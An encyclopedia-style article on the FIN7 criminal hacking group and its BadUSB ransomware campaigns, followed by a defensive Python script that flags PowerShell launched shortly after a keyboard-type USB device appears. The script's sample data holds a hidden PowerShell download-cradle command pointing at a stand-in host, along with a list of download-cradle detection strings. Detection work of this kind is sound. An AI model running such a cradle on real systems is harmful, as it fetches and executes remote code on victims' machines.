FIN7

FIN7, also called Carbon Spider, ELBRUS, or Sangria Tempest, is a Russian criminal advanced persistent threat group that has primarily targeted the U.S. retail, restaurant, and hospitality sectors since mid-2015. A portion of FIN7 is run out of the front company Combi Security. It has been called one of the most successful criminal hacking groups in the world. FIN7 is also associated with GOLD NIAGARA, ITG14, ALPHV and BlackCat.


History

In March 2017 FIN7 engaged in a spearphishing campaign against company employees involved with SEC filings. In August 2018 three members of FIN7 were charged by the United States Department of Justice for cybercrimes that impacted more than 100 U.S. companies. In November 2018 it was reported that FIN7 were behind data breaches of Red Robin, Chili's, Arby's, Burgerville, Omni Hotels and Saks Fifth Avenue.

In March 2020, the FBI issued a warning that members of FIN7 have been targeting companies in the retail, restaurant, and hotel industries with BadUSB attacks designed to deliver REvil or BlackMatter ransomware. Packages have been sent to employees in IT, executive management, and human resources departments. One intended target was sent a package in the mail which contained a fake gift card from Best Buy as well as a USB flash drive, with a letter stating that the recipient should plug the drive into their computer to access a list of items that could be purchased with the gift card. When tested, the USB drive emulated a keyboard and then initiated a series of keystrokes which opened a PowerShell window and issued commands to download malware to the test computer, which then contacted servers in Russia.

In December 2020 it was reported that FIN7 may be a close collaborator of Ryuk. In April 2021 a "high-level manager" of FIN7, Fedir Hladyr from Ukraine, was sentenced to 10 years in prison in the United States after he pleaded guilty to charges of conspiracy to commit wire fraud and one count of conspiracy to commit computer hacking. In January 2022, the FBI issued a warning that members of FIN7 have been targeting transportation and insurance companies (since August 2021), and defense companies (since November 2021), with BadUSB attacks designed to deliver REvil or BlackMatter ransomware. The intended targets were sent USB drives in packages claiming to be from Amazon or the United States Department of Health and Human Services, with letters talking about free gift cards or COVID-19 protocols that were purportedly further explained by information on the USB drive. When plugged in, the USB drives emulate a keyboard and then initiate a series of keystrokes which open a PowerShell window and issue commands to download malware.

In 2021 the group began using software known as ALPHV, written in Rust, which was offered to affiliates as Ransomware as a Service. In February 2023 the group was named in the Irish High Court as being behind the Munster Technological University ransomware attack.
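A defender-side correlation of the BadUSB chain described above (a keyboard-class USB device appears, then PowerShell starts on the same host seconds later, with a download command raising severity), written here as an added example and not taken from any FIN7 reporting; the event records, host names and URL are constructed.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta

# Strings typical of PowerShell download cradles; a match raises severity to "high".
DOWNLOAD_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest", "net.webclient")

@dataclass
class Event:
    ts: datetime
    kind: str          # "device" (new hardware) or "process" (process creation)
    host: str
    detail: str        # device description, or the process command line
    image: str = ""    # process image path (process events only)
    parent: str = ""   # parent image name (process events only)

def find_badusb_chains(events, window=timedelta(seconds=30)):
    """One alert per PowerShell launch that follows a newly attached keyboard
    on the same host within `window`. Earlier launches never match later keyboards."""
    keyboards = [e for e in events if e.kind == "device" and "keyboard" in e.detail.lower()]
    alerts = []
    for p in sorted(events, key=lambda e: e.ts):
        if p.kind != "process" or not p.image.lower().endswith("powershell.exe"):
            continue
        for k in keyboards:
            if k.host == p.host and timedelta(0) <= p.ts - k.ts <= window:
                cradle = any(m in p.detail.lower() for m in DOWNLOAD_MARKERS)
                alerts.append({"host": p.host, "device": k.detail, "parent": p.parent,
                               "delay_s": (p.ts - k.ts).total_seconds(),
                               "severity": "high" if cradle else "medium"})
                break
    return alerts

T0 = datetime(2022, 1, 10, 9, 14, 0)
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed records, not real telemetry
    # Victim pattern: new keyboard, then hidden PowerShell with a download cradle 8 s later.
    Event(T0, "device", "HR-PC-07", "HID Keyboard Device"),
    Event(T0 + timedelta(seconds=8), "process", "HR-PC-07",
          "powershell -w hidden -c \"(New-Object Net.WebClient).DownloadString('http://example.invalid/x')\"",
          PS, "explorer.exe"),
    # Benign: an admin opens PowerShell from a console an hour after attaching a keyboard.
    Event(T0, "device", "IT-PC-02", "HID Keyboard Device"),
    Event(T0 + timedelta(hours=1), "process", "IT-PC-02", "powershell.exe", PS, "cmd.exe"),
    # Benign: a storage device followed by PowerShell; no keyboard, so no alert.
    Event(T0, "device", "FIN-PC-11", "USB Mass Storage Device"),
    Event(T0 + timedelta(seconds=5), "process", "FIN-PC-11", "powershell.exe", PS, "cmd.exe"),
]
```

Running `find_badusb_chains(SAMPLE_EVENTS)` yields a single high-severity alert for HR-PC-07; the parent image is included because keystroke injection through the desktop shell typically shows a different parent than an operator's console session.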
